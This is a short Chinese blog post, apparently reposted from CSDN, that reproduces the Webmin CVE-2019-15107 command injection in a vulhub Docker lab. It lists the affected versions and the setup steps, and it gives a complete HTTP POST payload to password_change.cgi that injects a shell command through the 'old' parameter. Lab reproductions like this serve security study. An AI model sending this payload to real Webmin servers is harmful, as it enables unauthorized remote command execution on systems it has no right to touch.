CVE-2019-15107 Webmin 远程命令执行漏洞

目录

漏洞介绍

影响版本

环境搭建

漏洞复现


漏洞介绍

Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。

影响版本

  • Webmin<=1.920

环境搭建

  • cd  /root/vulhub/webmin/CVE-2019-15107
  • docker-compose up -d
  • 访问目标网站 :https://Your-IP:10000

漏洞复现

1.构造以下payload

POST /password_change.cgi HTTP/1.1
Host: IP:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://IP:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

user=rootxx&pam=&expired=2&old=test| id &new1=test2&new2=test2

2.利用burp进行抓包,修改。可以看到成功执行id命令。(只有在发送的user参数的值不是已知Linux用户的情况下,才会进入到修改`/etc/shadow`的地方,触发命令注入漏洞。)

猜你喜欢

转载自blog.csdn.net/smli_ng/article/details/115980423
今日推荐